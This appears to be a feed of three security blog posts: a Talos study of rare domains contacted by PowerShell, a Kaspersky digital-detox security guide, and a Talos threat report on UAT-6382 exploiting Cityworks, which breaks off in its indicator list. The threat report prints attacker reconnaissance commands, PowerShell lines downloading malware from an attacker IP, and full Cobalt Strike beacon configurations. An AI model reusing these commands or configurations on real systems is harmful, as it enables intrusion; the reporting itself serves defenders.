By Darin Smith and John Arneson

• Cisco Talos reviewed six months of network connection telemetry logs spanning June 1, 2024 – Dec. 31, 2024, containing 3,220,829 log events and 742 unique base domains, to explore if domains that PowerShell rarely contacts are more likely to be malicious. 
• Key findings reveal that the odds of a rare domain being malicious were 3.18 times higher than for frequently contacted domains (95% CI: 0.39–25.9), suggesting a trend towards higher risk in rare domains. 
• Notably, the non-rare domain ‘githubusercontent.com’ was flagged as malicious due to activity from its subdomain ‘raw.githubusercontent.com’. This is an example of why subdomains should be considered when looking for malicious network traffic, especially for cloud services where the service itself is legitimate, but the content hosted on it is not guaranteed to be.  

---

Research Methodology 

Hypothesis

At a sufficiently high volume of telemetry, domain names that PowerShell rarely connects to are more likely to be malicious than domains that are frequently connected to, regardless of PowerShell module. 

Data Collection 

Talos queried telemetry for PowerShell network connection logs from a time period of June 1, 2024 to Dec. 31, 2024. This dataset included the following processes: ‘powershell.exe’, ‘powershell studio.exe’, ‘powershell_ise.exe’, ‘powershelltools.exe’, ‘powershelltoolsx64.exe’, ‘pwsh’, and ‘pwsh.exe’. All of these processes are different versions of PowerShell. Talos excluded non-public top-level domains (TLDs), such as internal domains, to focus on external connections.  

Data Processing

Using the tldextract library, Talos extracted base domains (e.g., ‘automox.com’ from ‘api.automox.com’), resulting in 742 unique base domains. Rarity was defined as an average of ≤5 average contacts per full domain, calculated by dividing the total contacts by the number of unique full domains per base domain. This threshold identified 550 rare domains (74.1% of the total).  

Threat Intelligence and Manual Review 

Talos assessed domain reputation using ReversingLabs (RL), which flagged a domain as malicious if any third-party source indicated so. To mitigate false positives (e.g., ‘adobe.com’), 29 domains were manually reviewed and overridden as benign, and their process arguments were documented. For subdomains such as ‘raw.githubusercontent.com’ under ‘githubusercontent.com’, the process arguments in those logs were manually reviewed, flagging 5 out of 10 connections as malicious based on commands like downloading PowerSploit or executing Invoke-Mimikatz, ensuring comprehensive threat detection.

Findings & Analysis 

Domain Contact Distribution 

The distribution of contacts was heavily skewed: 

• Percentiles: 60th percentile at 5.0 contacts, 90th at 82.0, 95th at 321.55, and 99th at 7,925.87 
• Top Domains: ‘automox.com’ (2,282,308 contacts), ‘launchdarkly.com’ (493,812), and ‘amazonaws.com’ (166,536) accounted for most activity.
  • Automox is a service for automated endpoint configuration and patch management.
  • LaunchDarkly is a software development platform for managing feature flags and context-aware targeting of features.
  • Amazon Web Services (AWS) is the largest cloud service provider. 
• Rare Domains: 550 of 742 domains fell into the rare category.

Malicious Domain Statistics 

• Rare Domains: 9 malicious out of 550 (1.64%, 95% CI: 0.86%–3.08%)
• Non-Rare Domains: 1 malicious out of 192 (0.52%, 95% CI: 0.09%–2.89%), notably ‘githubusercontent.com’
• Odds Ratio: 3.18 (95% CI: 0.39–25.9), indicating a trend towards higher risk in rare domains, though not statistically significant (chi-square p=0.4291, Fisher’s exact p=0.4668), likely due to small sample sizes (9 rare, 1 non-rare) 

Case Study: githubusercontent.com 

The non-rare domain ‘githubusercontent.com’ (38 contacts, 2 full domains: ‘raw.githubusercontent.com’ and ‘objects.githubusercontent.com’, average 19.00 contacts per full domain) was flagged as malicious due to 5 manually identified malicious contacts from ‘raw.githubusercontent.com’. These contacts involved potentially malicious PowerShell commands, such as downloading and executing scripts like PowerSploit or Invoke-Mimikatz. The other subdomain, ‘objects.githubusercontent.com’ (28 contacts), showed no malicious activity. This finding illustrates that even frequently contacted domains can host malicious subdomains, emphasizing the need for subdomain-level analysis in threat detection.

Comparison to other Processes 

Another research question investigated was how the domains contacted by other similar processes would compare to those contacted by PowerShell. For the purposes of this research, Talos chose the following processes for analysis: 

• ‘rundll32.exe’ 
• Python (including macOS and Windows versions) 
• ‘cmd.exe’ 
• ‘cscript.exe’ 
• ‘wscript.exe’ 
• ‘bash’ 
• ‘zsh’

These processes are primarily other command line or script interpreters, as well as ‘rundll32.exe’, which allows executing Dynamically Linked Libraries (DLLs) from the command line.

When the same heuristics as were utilized for PowerShell were applied to the domains contacted by these processes, the results varied somewhat. Across 156,203 total connection records for ‘rundll32.exe’, 940 unique domains were contacted. Of these, 722 of these domains were “rare,” using the same heuristic applied to PowerShell (i.e., they were contacted at most five times). Only one of the domains contacted was found to be malicious, either among the rare domains or the non-rare domains.

Similarly, among 795,346 total connection records for Python, 825 unique domains were contacted and 616 were rare using the same criteria. None of the rare domains were malicious, while 1 of the non-rare domains was. The processes cscript, cmd, zsh and csh had similar results, with no or single digit numbers of malicious domains contacted. However, wscript was much more interesting. It had a much smaller amount of total utilization in the dataset investigated, with just 6,936 connection events and 82 unique domains contacted. Of these, 58 domains were rare (or roughly 71%), and 5 were found to be malicious.

Recommendations 

• Prioritize Rare Domains: Security teams should focus investigations on rare domains due to their higher likelihood of being malicious, despite statistical non-significance. This finding applies primarily to PowerShell and wscript among the processes considered in this research.  
• Subdomain Analysis: For frequently contacted domains, analyze subdomains and process arguments to detect malicious activity, as demonstrated with ‘githubusercontent.com’. 
• Integrate Manual Review: Combine automated threat intelligence with manual reviews to reduce false positives and identify nuanced threats, particularly in high-contact domains. 
• Investigate Anomalous Utilization of ‘wscript.exe’: Some environments may still commonly utilize wscript. However, this research suggests that in environments where it is rare, it has the highest likelihood to be used to connect to malicious domains of the processes researched.

Future Work 

This research presents several opportunities for future research. One opportunity is temporal analysis to determine if there were time-based patterns for contacting domains, and if so, determining if these patterns could be used to identify malicious activity. This could potentially include seeing increased contacts of malicious domains during weekends or off-hours. Time-series analysis could be applied to the data to test this hypothesis.

Another opportunity is the behavioral analysis of process arguments, focusing on identifying recurring patterns tied to malicious activity, such as downloading PowerShell scripts from a remote host, or exfiltration of data. This could be used to refine the current rarity to malicious correlation of 1.64% for rare domains versus 0.52% for non-rare domains. This may spotlight behavioral red flags and give actionable insights for more precision detection logic.

Finally, future research can develop a risk scoring system that integrates multiple factors such as contact frequency, malicious rate, TLDs and even ReversingLabs’ network threat intelligence. This can provide a scalable and practical tool for security teams to prioritize high-risk domains, whether rare or non-rare like ‘githubusercontent.com’. This builds on the current analysis but also paves the way for more robust, data-driven strategies to combat threats, ensuring this research delivers lasting value to the security community.

Cisco Talos Blog – ​Read More

These days, we’re hardly ever separated from our devices. According to a 2024 study conducted in the U.S. by analytics firm Reviews.org, the average user spends around 2.5 months of a year on their smartphone! That’s a staggering figure — showing just how deeply mobile devices have become ingrained into our daily lives.

A digital detox — a trendy term for taking a break from our screens and notifications — can benefit anyone with a smartphone and/or laptop. According to a review of 10 studies conducted between 2013 and 2023, digital detoxes help improve sleep quality, life satisfaction, and overall wellbeing. They also reduce anxiety, stress, depression, and phone addiction. What’s more, regular digital breaks can restore the brain’s ability to focus for long periods and process information deeply.

However, completely unplugging from the internet can pose certain cybersecurity risks to your digital life. So today, we’ll look at how to give your mind a rest while ensuring the security of your accounts, devices, data, and even smart home.

What could go wrong during a digital detox?

Of course, it’s impossible to completely eliminate all risks, but you can make some preparations to minimize their impact. But what kinds of risks are we talking about?

• Account theft — both of regular, single-service accounts, and ecosystem accounts (like Google, Apple, Facebook, Instagram, Samsung, etc.) via password guessing or SIM swapping.
• Unauthorized subscriptions and charges.
• Leak of personal data from password dumps or due to a lack of two-factor authentication.
• Account hijacking in messengers and social networks.
• Use of your devices or accounts to send spam.
• Loss or theft of your gadgets.
• Household issues — break-ins while you’re away, flooding, gas leaks, or fires.

How to stay in control during a digital detox?

Start with a digital spring-clean, and strengthen your digital perimeter across a few key areas.

Accounts, data, and finances

• Review your subscriptions. More than half of users worldwide pay for subscriptions they don’t use. According to one study, only 38% of respondents had used all of their subscriptions in the past six months. The majority had unused ones: 15% hadn’t used two, 11% three, and 3% more than five. Moreover, we tend to underestimate our total subscription costs by two to three times — even though we spend, on average, around a thousand dollars a year on them! So reviewing your subscriptions is a great place to start your digital detox, and dedicated subscription managers can help make this easier.
  Make a list of subscriptions to pause or cancel completely while you’re away. And conversely, make sure the services that require ongoing payments are linked to an account with enough funds to cover them during your detox. This might include services like website hosting autopayments, VPS rental for a project, or a paid cloud storage or mail server. Also check how long your data is retained after suspending a subscription — and when it might be permanently deleted.
• Beef up your passwords. Review your critically important accounts: online banking, government service portals, crypto wallets, and so on. If you’re already using a password manager, take advantage of the built-in password leak check If you store passwords in your browser, or your password manager can’t check for compromised passwords, switch to Kaspersky Password Manager. Replace weak passwords with unique and strong ones — our password manager can generate and remember them for you.
• Enable two-factor authentication (2FA) wherever possible so that logging in requires a one-time code. Keep in mind that codes sent via SMS aren’t secure — so for critical accounts (banks, email, social networks, ecosystem accounts like Google and Apple), switch to an authenticator app wherever you can. By the way, our password manager can help here too.
• Make backups. Create up-to-date backups of important files stored both locally and online — because the internet remembers not quite everything. Keep multiple copies — for example, on NAS at home as well as in a reliable cloud with encryption features. Don’t forget to make fresh backups of your smartphone and any other devices you’re taking with you, and store them in a safe place.
• Give backup access to people you trust. If you’re a blogger, run Telegram channels or video-hosting platforms, or have popular social media accounts, be sure to set them up so you’re not the only one with access. In case attackers do manage to compromise your account — for example, through SIM swapping or hijacking session cookies — a prompt response is essential, even if you’re away. Kaspersky Password Manager can help here too: install it on multiple devices and sync your passwords and two-factor authentication tokens across them.
• Notify your bank of your travel plans so they don’t block your card due to a “suspicious transaction” abroad. Depending on your bank, this can be done via in-app chat, a hotline, or in person.

Gadgets and connectivity

• Install security updates. Update the operating systems, apps, and firmware on all your gadgets to the latest versions. Patches fix known vulnerabilities and lower the chances of a successful attack on you. If you’re using Android, check out our pain-free guide to installing Android updates.
• Protect your devices. Make sure your both your computer and smartphone are protected with reliable security software. Enable disk encryption, and set a strong password for unlocking your device — whether you’re taking it with you or leaving it behind. On smartphones, disable biometric access, use strong passcodes, and enable automatic data-wipe after several failed unlock attempts.
  To be able to locate lost Apple devices, turn on Find My. Kaspersky for Android has a similar feature for Android devices.
• Protect your SIM cards from being swapped. Your cellphone number provides access to many services. It can be used to access social media, banking, government services, and — most critically — ecosystem accounts that store important personal data like your calendar, cloud documents, and payment card data saved in your browser. Criminals may try to get a duplicate of your SIM card at a mobile store to bypass SMS or call verification. Of course, this can happen at any time, but if you’re away, you won’t be able to respond as quickly.
  Some mobile carriers let you set a password without which all SIM reissue requests are denied. Some providers let you prohibit them from providing you with services remotely and preventing anyone from replacing your SIM card, even if they have а power of attorney – real or fake. Check what options your provider offers, and for more tips on SIM swapping protection, see our article on the topic.
• Set a good old PIN code on your primary SIM card before your trip — especially if you plan to remove it from your phone to leave at home, or swap it for a travel SIM while abroad. That way, even if your SIM falls into the wrong hands, they won’t be able to access your accounts: once inserted into a phone, the SIM won’t work without the PIN code. If you have an eSIM, keep the multi-use eSIM activation QR code stored in a secure place — or opt for single-use codes instead.
• Make sure you have a backup communication channel. If you’re heading somewhere where mobile signal is unreliable or nonexistent — like in mountainous regions — satellite SMS services (like Garmin’s inReach) or Apple’s Emergency SOS via satellite feature can be useful. Be sure to check the subscription details in advance and confirm the service is available in the country you’re visiting.

Personal safety

• Check your digital legacy settings and designate who gets access to your accounts if something happens to you. In Apple’s ecosystem, you can assign an account recovery contact in case you completely lose access to your Apple ID. With a code they receive according to your instructions, the trusted person can help you regain access to your account and data — such as a smartphone backup. However, they won’t get direct access to your data. In addition to a recovery contact, Apple also lets you designate a Legacy Contact. Google offers a similar feature called Inactive Account Manager, which is especially worth setting up if you plan not to use Google services for a long time. This option sends your selected contacts a backup of chosen data after a set period of inactivity — the default is three months. If that’s not enough for your full-on digital detox, be sure to increase the inactivity period in the settings so you don’t alarm your trusted contacts.

• Decide which smart-home and IoT devices should remain active while you’re away. Surveillance cameras and alarms should ideally not just stay on, but be connected to an uninterruptible power supply. That way, the alarm can still send a signal to the monitoring center even if burglars cut the power before breaking in. On the other hand, smart sockets, speakers, or appliances you don’t plan to use should be unplugged and disconnected from the internet. Learn more about smart-home protection here.
• Change the default passwords on all IoT devices to your own, strong ones, and don’t forget your router. Many devices come with standard login/password combos out of the box, making them vulnerable to botnet attacks. Also, if an attacker gains access to your IP camera, they can monitor your home and plan a break-in while you’re away.
• Make sure you (or a trusted person) can receive critical alerts — for example, from smoke, gas, or flood detectors — and that a relative, trusted neighbor, or friend can quickly deal with any issues. Leave your trusted contact with spare keys and a way to reach you. If you’re going fully offline for your digital detox, this could be your hotel’s phone number or the contact details of your travel companion.

How to minimize gadget use on vacation

A full digital detox might feel too extreme for many people. But if you want to truly relax without worrying about your online life or offline property, we recommend at least sticking to the following rules:

• Forget about the news, social media, and email — or at least stop checking them all the time. Special modes on Apple and Android devices can help limit your access to the most distracting apps. If these built-in tools aren’t enough, you could “become your own child” — install Kaspersky Safe Kids (included in your Kaspersky Premium subscription) and customize it by setting filters for apps, websites, and social media — adding daily time limits for each.
• Minimize your digital footprint. Avoid posting vacation photos or updates in public in real time — better is to share the memories once you’re back. That way, you’re not telling the world: “Hey, I’m not home and won’t be for two more weeks!” If you really can’t resist, at least limit the audience to close friends only.
• Let colleagues and family know in advance that you’ll be away, so they won’t worry or — most importantly — send you anything sensitive or urgent via email or messaging apps. Also, review your messaging account settings to prevent hijacking while you’re gone. Scammers love to strike when account owners are absent — so a quick reminder to your contacts not to fall for messages like “Hey! Can you lend me $100 till tomorrow?” can save you a lot of trouble.
• Set up an out-of-office message for your email and voicemail stating that you’re temporarily offline — without giving too many details about your destination or reasons for your trip.
• Take just one, essential device. If you’re traveling, don’t bring every gadget you own. Choose just one — whether a laptop, tablet, or smartphone — and keep it in your carry-on luggage. At your accommodation, store your device in a safe and never leave it unattended — even if you don’t plan to use it. If someone gets physical access to your device, they could compromise your data — and in the case of a smartphone, even steal your SIM card.
• Use a backup phone for SMS messages. If you’re swapping your main SIM for a local or tourist one, insert your home SIM into an old backup phone — ideally a basic button phone with a long battery life — and turn off mobile data. This way, you’ll still receive calls and texts to your main number and can react promptly if something suspicious happens — like getting a two-factor authentication code you didn’t request, or a bank alert about a strange transaction or loan approval. To avoid roaming charges, simply do not answer the calls from this device and contact the caller on another channel. Keep this phone in a hotel safe or other secure spot and check it at least once a day.
• Avoid risky connections. If possible, avoid connecting to unknown Wi-Fi networks or using someone else’s computer — especially if your goal is to unplug from the internet and screens. If you do need to get online (say, to check an important email), use your own device and stick to trusted Wi-Fi networks — or, better yet, mobile internet. Tourist SIM cards with cheap data plans are available pretty much everywhere in today’s world. With public Wi-Fi, use a secure connection to encrypt your traffic. And never enter passwords when using internet café networks or shared computers.

How to avoid missing anything important when you return

After your digital vacation, it’s important to return online wisely — checking what happened while you were away.

• Power on your devices and check for updates. Turn on all the gadgets you’d switched off. Security updates may have been released while you were away; install them as soon as possible before actively using your devices again. Make sure your antivirus databases are also up to date. If you had any IoT devices unplugged, turn them back on and ensure they’re working properly and reconnected to your home network (and double-check that no passwords have been reset).
• Review notifications and logs. Go through the backlog of notifications in your email, banking apps, and social media accounts. Pay close attention to login attempt alerts, two-factor authentication codes, and bank messages about transactions. If you notice any attempts to access your accounts that occurred during your digital detox, your first step should be to change the passwords for those services, terminate suspicious sessions if possible, and contact support. An SMS or push notification with a login code you didn’t request is a strong sign of a potential hack or SIM-swap attempt; in that case, immediately reach out to your mobile provider and the service in question.
• Check your SIM card and phone. After a long time offline, make sure your phone number is still active and functioning, and that your balance hasn’t been drained by any suspicious activity. A pre-set PIN code and a restriction on reissuing SIM cards should reliably protect your number. However, it’s still worth double-checking your mobile account and, at the slightest suspicion, requesting a detailed expenses log from your mobile provider.
• Assess your resilience and make notes and amendments for the future. Reflect on how well your digital ecosystem held up during your time away. The ideal outcome: nothing went wrong, your data is intact, your accounts are secure, and your home is fine. If that’s the case, congratulations — not only did you enjoy your break, but you also confirmed that your security measures work even without constant supervision. If any issues did arise — say, a backup failed or an IP camera went offline — treat them not as disasters but as lessons to learn, and take measures to improve your setup going forward.

We hope these tips help you enjoy a smooth and secure digital-detox vacation. Make the most of your time offline — and remember, it’s better to be safe than sorry. And to be even safer, follow our Telegram channel.

Kaspersky official blog – ​Read More

• Cisco Talos has observed exploitation of CVE-2025-0994, a remote-code-execution vulnerability in Cityworks, a popular asset management system.  
• The Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have both released advisories pertaining to this vulnerability, with Trimble’s advisory specifically listing indicators of compromise (IOCs) related to the intrusion exploiting the CVE.  
• IOCs pertaining to intrusions discovered by Talos that involve the exploitation of CVE-2025-0994 overlap with those listed in Trimble’s advisory.  
• Talos clusters this set of intrusions, exploiting CVE-2025-0944, under the “UAT-6382” umbrella of activity. Based on tooling and tactics, techniques and procedures (TTPs) employed by the threat actor, Talos assesses with high confidence that the exploitation and subsequent post-compromise activity is carried out by Chinese-speaking threat actors.  
• Post-compromise activity involves the rapid deployment of web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers. UAT-6382 also employed the use of Rust-based loaders to deploy Cobalt Strike and VSHell malware to maintain long-term persistent access.  
• We track the Rust-based loaders as “TetraLoader,” built using a recently publicly available malware building framework called “MaLoader.” MaLoader, written in Simplified Chinese, allows its operators to wrap shellcode and other payloads into a Rust-based binary, resulting in the creation of TetraLoader.

---

Talos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning January 2025 when initial exploitation first took place. UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access. Upon gaining access, UAT-6382 expressed a clear interest in pivoting to systems related to utilities management. 

The web shells, including AntSword, chinatso/Chopper and generic file uploaders, contained messaging written in the Chinese language. Furthermore, the custom tooling, TetraLoader, was built using a malware-builder called “MaLoader” that is also written in Simplified Chinese. Based on the nature of this tooling, TTPs, hands-on-keyboard activity and victimology, Talos assesses with high confidence that UAT-6382 is a Chinese-speaking threat actor.

Initial reconnaissance 

Successful exploitation of the vulnerable Cityworks application leads to the attackers conducting preliminary reconnaissance to identify and fingerprint the server: 

cmd.exe /c ipconfig 
cmd.exe /c pwd 
cmd.exe /c dir 
cmd.exe /c dir .. 
cmd.exe /c dir c: 
cmd.exe /c dir c:inetpub 
cmd.exe /c tasklist 

 Specific folders were enumerated before attempting to place web shells in them: 

cmd.exe /c dir c:inetpubwwwroot 
cmd.exe /c c:inetpubwwwrootCityworksServerWebSite 
cmd.exe /c dir c:inetpubwwwrootCityworksServerWebSiteAssets 

UAT-6382 heavily utilizes web shells 

Initial reconnaissance almost immediately led to the deployment of web shells to establish backdoor entry into the compromised network. These web shells consisted of multiple variations of AntSword, chinatso and Behinder along with additional generic file uploaders containing messages written in the Chinese language.

File enumeration and staging for exfiltration 

UAT-6382 enumerated multiple directories on servers of interest to identify files of interest to them and then staged them in directories where they had deployed web shells for easy exfiltration: 

cmd.exe /c dir c:inetpubwwwrootCityworksServer 
cmd.exe /c copy c:inetpubwwwrootCityworksServer<backup_archives> c:inetpubwwwrootCityworksServerUploads

Deployment of backdoors 

UAT-6382 downloaded and deployed multiple backdoors on compromised systems via PowerShell: 

cmd[.]exe /c powershell -Command Invoke-WebRequest -Uri 'hxxp[://]192[.]210[.]239[.]172:3219/LVLWPH[.]exe' -OutFile '<parent_directory>LVLWPH[.]exe' 
 
cmd.exe /c powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/MCUCAT[.]exe' -OutFile 'C:windowstempz1.exe' 
 
powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/TJPLYT[.]exe' -OutFile 'C:windowstempz33.exe' 
 
cmd.exe /c powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/z44[.]exe' -OutFile 'C:windowstempz44.exe' 

The implants Talos recovered are Rust-based loaders containing an encoded or encrypted payload. The payload is decoded/decrypted and injected into a benign process by the loader component. We track the loaders as “TetraLoader.”

TetraLoader analysis 

TetraLoader is a simple Rust-based loader. It will decode an embedded payload and inject it into a benign process such as notepad[.]exe to activate the payload. Talos has so far found two types of payloads deployed by TetraLoader on the infected endpoints: 

1. Cobalt Strike beacons: These are position-independent, in-memory Cobalt Strike beacon shellcodes that are injected into a specified benign process by TetraLoader. 
2. VShell stager: Position independent shellcode, we’ve identified as a stager for VShell, that talks to a hardcoded C2 server and executes code issued to it. 

TetraLoader is built using a relatively new payload builder framework known as “MaLoader,” which first appeared on GitHub in December 2024. MaLoader has multiple options to encode and embed shellcodes into TetraLoader, the Rust-based container. 

Figure 2. MaLoader’s builder interface

MaLoader is written in Simplified Chinese, indicating that threat actors that employed it likely knew the language to a substantial degree of proficiency.

Cobalt Strike beacons 

The Cobalt Strike beacons are relatively straightforward, with minimal changes as compared to traditionally generated Cobalt Strike beacons. One of the beacons Talos discovered reaches out to the command-and-control (C2) domain “cdn[.]lgaircon[.]xyz” and specifically consists of the following configuration settings:

BeaconType - HTTPS  
Port - 443  
SleepTime - 45000  
MaxGetSize - 2801745  
Jitter - 37  
MaxDNS - Not Found  
PublicKey - b'0x81x9f0rx06t*x86Hx86xf7rx01x01x01x05x00x03x81x8dx000x81x89x02x81x81x00x81x92xaax1dxdephxa6x80xf7xc9x7fxcfxbaxce6xd9x11(x00x1ax95

A second beacon using the same C2 domain consists of the following more detailed configuration:

BeaconType - HTTPS  
Port - 443  

SleepTime - 35000  
MaxGetSize - 2097152  
Jitter - 30  
MaxDNS - Not Found  

PublicKey_MD5 - 00c96a736d29c55e29c5e3291aedb0fd  

C2Server - lgaircon[.]xyz,/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2  
UserAgent - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15  

HttpPostUri - /owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG  

Malleable_C2_Instructions - NetBIOS decode 'a'  

HttpGet_Metadata - ConstHeaders  
                  Host: lgaircon[.]xyz  
                  Accept: */ * 
                  Cookie: MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs
                  ConstParams  
                  path=/calendar  
                  Metadata  
                  netbios  
                  parameter "wa"  

HttpPost_Metadata - ConstHeaders  
                    Host: lgaircon[.]xyz  
                    Accept: */ * 
                    SessionId  
                    netbios  
                    prepend "wla42="  
                    prepend "xid=730bf7;"  
                    prepend "MSPAuth=3EkAjDKjI;"  
                    prepend "ClientId=1C0F6C5D910F9;"  
                    prepend "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;"  
                    header "Cookie"  
                    Output  
                    netbios  
                    parameter "wa"  

PipeName - Not Found  
DNS_Idle - Not Found  
DNS_Sleep - Not Found  
SSH_Host - Not Found  
SSH_Port - Not Found  
SSH_Username - Not Found  
SSH_Password_Plaintext - Not Found  
SSH_Password_Pubkey - Not Found  
SSH_Banner -  

HttpGet_Verb - GET  
HttpPost_Verb - GET  
HttpPostChunk - 96  

Spawnto_x86 - %windir%syswow64gpupdate[.]exe  
Spawnto_x64 - %windir%sysnativegpupdate[.]exe  

CryptoScheme - 0  

Proxy_Config - Not Found  
Proxy_User - Not Found  
Proxy_Password - Not Found  
Proxy_Behavior - Use IE settings  

Watermark_Hash - NtZOV6JzDr9QkEnX6bobPg==  
Watermark - 987654321  

bStageCleanup - True  
bCFGCaution - False  

KillDate - 0  

bProcInject_StartRWX - True  
bProcInject_UseRWX - False  
bProcInject_MinAllocSize - 26808  
ProcInject_PrependAppend_x86 - b'x90x90x90x90x90x90x90x90x90'  
                                Empty  

ProcInject_PrependAppend_x64 - b'x90x90x90x90x90x90x90x90x90'  
                                Empty  

ProcInject_Execute - ntdll[.]dll:RtlUserThreadStart  
                     NtQueueApcThread-s  
                     SetThreadContext  
                     CreateRemoteThread  
                     kernel32[.]dll:LoadLibraryA  
                     RtlCreateUserThread  

ProcInject_AllocationMethod - VirtualAllocEx  

bUsesCookies - True  
HostHeader -  
headersToRemove - Not Found  

DNS_Beaconing - Not Found  
DNS_get_TypeA - Not Found  
DNS_get_TypeAAAA - Not Found  
DNS_get_TypeTXT - Not Found  
DNS_put_metadata - Not Found  
DNS_put_output - Not Found  
DNS_resolver - Not Found  
DNS_strategy - round-robin  
DNS_strategy_rotate_seconds - -1  
DNS_strategy_fail_x - -1  
DNS_strategy_fail_seconds - -1  
Retry_Max_Attempts - 0  
Retry_Increase_Attempts - 0  
Retry_Duration - 0 

Another beacon reaches out to C2 “www[.]roomako[.]com” and has the following configuration: 

BeaconType - HTTPS  
Port - 443  
SleepTime - 25000  
MaxGetSize - 2801745  
Jitter - 37  
MaxDNS - Not Found  

PublicKey - b"0x81x9f0rx06t*x86Hx86xf7rx01x01x01x05x00x03x81x8dx000x81x89x02x81x81x00xaa#x18xebx;xd3?xe7xa7xb5x95xb1xe7xb2ax99O)x8exebx/:xc10cxfex04#xe5_ x82xabx9dxbex99xd0Wxb5xfafrax14@x9ax16Fs5xa0xe6xf3xa6x13xdcx91Nxdeqlx89xc5RkDxefqxeaxa8xc5'$xdf]l#xacsx0c/;xc3Exf8x0fSx7fxbdxcdx0b]Ex97xf2xf2Qxe8x00xa7ux04x90rx95xfdxac`k9xefaxe5x9ftWxc5xc7x90xb8x8ax15xab+x02x03x01x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"  

C2Server - www[.]roomako[.]com,/jquery-3[.]3[.]1[.]min[.]js  
UserAgent - Not Found  
HttpPostUri - /jquery-3[.]3[.]2[.]min[.]js  
HttpGet_Metadata - Not Found  
HttpPost_Metadata - Not Found  

SpawnTo - b'x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'

PipeName - Not Found  

DNS_Idle - Not Found  
DNS_Sleep - Not Found  
SSH_Host - Not Found  
SSH_Port - Not Found  
SSH_Username - Not Found  
SSH_Password_Plaintext - Not Found  
SSH_Password_Pubkey - Not Found  

HttpGet_Verb - GET  
HttpPost_Verb - POST  
HttpPostChunk - 0  

Spawnto_x86 - %windir%syswow64dllhost[.]exe  
Spawnto_x64 - %windir%sysnativedllhost[.]exe  

CryptoScheme - 0  

Proxy_Config - Not Found  
Proxy_User - Not Found  
Proxy_Password - Not Found  
Proxy_Behavior - Use IE settings  

Watermark - 987654321  
bStageCleanup - True  
bCFGCaution - False  
KillDate - 0  

bProcInject_StartRWX - False  
bProcInject_UseRWX - False  
bProcInject_MinAllocSize - 17500  
ProcInject_PrependAppend_x86 - b'x90x90x90'  
                              Empty  

ProcInject_PrependAppend_x64 - b'x90x90x90'  
                              Empty  

ProcInject_Execute - ntdll:RtlUserThreadStart  
                     CreateThread  
                     NtQueueApcThread-s  
                     CreateRemoteThread  
                     RtlCreateUserThread  

ProcInject_AllocationMethod - NtMapViewOfSection  

  bUsesCookies - True  

HostHeader - Host: www[.]roomako[.]com 

VShell stager 

The VShell stager is relatively simple and uses rudimentary socket APIs to connect with a hardcoded C2 server such as “192[.]210[.]239[.]172:2219”. The stager, usually injected into a benign process by TetraLoader, initially sends a preliminary beacon to the C2 and then waits for a response. The response sent by the C2 is usually a single-byte Xorred payload that is then executed in memory by the implant. This is likely UAT-6382’s modification in VShell. 

The payload received by the VShell stager is in fact the actual VShell implant. VShell is a GoLang-based implant that talks to its C2 and provides a wide variety of remote access trojan-based functionalities, such as the capabilities to perform file management, run arbitrary commands, take screenshots and run NPS-based proxies on the infected endpoint.

Like other Chinese-authored tooling observed in the intrusions, VShell C2 panels are also written in Chinese. Although limited language support for English is available in the panel, it still mostly uses the Chinese language as seen in Figure 5, indicating that operators need to be familiar with the language to use the panel proficiently. 

Coverage 

Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

Indicators of compromise (IOCs) 

The IOCs can also be found in our GitHub repository here.

TetraLoader 

14ed3878b6623c287283a8a80020f68e1cb6bfc37b236f33a95f3a64c4f4611f 
4ffc33bdc8527a2e8cb87e49cdc16c3b1480dfc135e507d552f581a67d1850a9 
1de72c03927bcd2810ce98205ff871ef1ebf4344fba187e126e50caa1e43250b 
1c38e3cda8ac6d79d9da40834367697a209c6b07e6b3ab93b3a4f375b161a901 

 CobaltStrike beacons 

